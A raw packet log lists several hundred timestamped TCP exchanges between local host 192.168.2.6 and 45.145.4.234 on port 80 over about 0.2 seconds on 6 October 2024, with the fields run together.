                                                                                                                                                Oct 6, 2024 22:18:46.691050053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691055059 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691066980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691078901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691106081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691370010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691389084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691399097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691410065 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691417933 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691447020 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691466093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691476107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691484928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691497087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691504955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691509962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691526890 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691549063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691562891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691574097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.691584110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691600084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.691626072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773353100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773380041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773391008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773428917 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773479939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773507118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773520947 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773531914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773544073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773546934 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773556948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773572922 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773595095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773637056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773710012 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773721933 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773736000 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773746014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773757935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773758888 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773773909 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773798943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.773866892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.773900986 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774077892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774090052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774101019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774125099 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774142027 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774260044 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774298906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774303913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774313927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774333954 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774350882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774475098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774491072 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774501085 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774512053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774527073 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774544001 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774626017 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774640083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774651051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774658918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774663925 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774687052 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774709940 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774856091 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774868011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774878979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774893045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774899006 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774905920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774914980 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774916887 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.774944067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.774957895 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775118113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775130987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775141001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775151014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775161982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775165081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775176048 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775182962 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775208950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775407076 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775418043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775429010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775438070 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775443077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775448084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775450945 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775459051 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775470018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775480032 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775481939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775490999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775507927 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775507927 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775515079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775526047 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775544882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775902033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775917053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775923967 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775930882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775937080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775942087 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775944948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775947094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.775949955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.775986910 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776160002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776173115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776184082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776189089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776196003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776206017 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776230097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776331902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776345968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776356936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776365995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776381016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776400089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776524067 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776642084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776691914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776695013 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776705980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776726961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776751995 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776753902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776791096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776824951 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776860952 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776889086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776901007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776911020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.776937008 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.776957035 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777009010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777020931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777034998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777044058 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777061939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777137041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777148962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777173996 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777189016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777225018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777237892 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777261019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777276039 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777374029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777450085 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777448893 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777465105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777488947 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777504921 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777532101 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777544022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777554035 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777564049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777565956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777582884 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777626038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777717113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777729988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777741909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777753115 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777759075 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777761936 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777765989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777790070 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777805090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777914047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777924061 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777935028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777945995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.777950048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.777980089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778111935 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778122902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778132915 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778142929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778145075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778161049 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778177023 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778337002 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778348923 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778359890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778368950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778373957 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778378010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778395891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778402090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778403044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778409004 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778415918 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778430939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778448105 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778611898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778649092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778691053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778702021 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778714895 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778723955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778724909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778739929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778743982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778752089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778769970 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778788090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778912067 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778915882 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778925896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778935909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.778948069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.778978109 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.860369921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860398054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860409975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860419989 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860440969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860451937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860462904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860507965 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.860563993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.860606909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860618114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860627890 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860639095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860649109 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860657930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.860677958 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.860701084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.860755920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860769033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.860797882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.860814095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861090899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861141920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861145020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861159086 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861191034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861202955 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861248016 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861259937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861270905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861295938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861320019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861377001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861390114 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861401081 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861419916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861422062 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861442089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861495972 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861589909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861603022 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861614943 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861625910 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861634016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861665010 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861690044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861803055 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861819029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861829042 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861840010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861850023 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861850977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861862898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861870050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861876011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861886978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861897945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.861907005 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861927032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.861942053 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.862117052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862131119 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862152100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862162113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862168074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.862179995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862193108 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862205029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862209082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862211943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.862219095 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862226009 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.862256050 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.862281084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.862454891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862466097 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862478018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862489939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:46.862500906 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:46.862502098 CEST806388545.145.4.234192.168.2.6
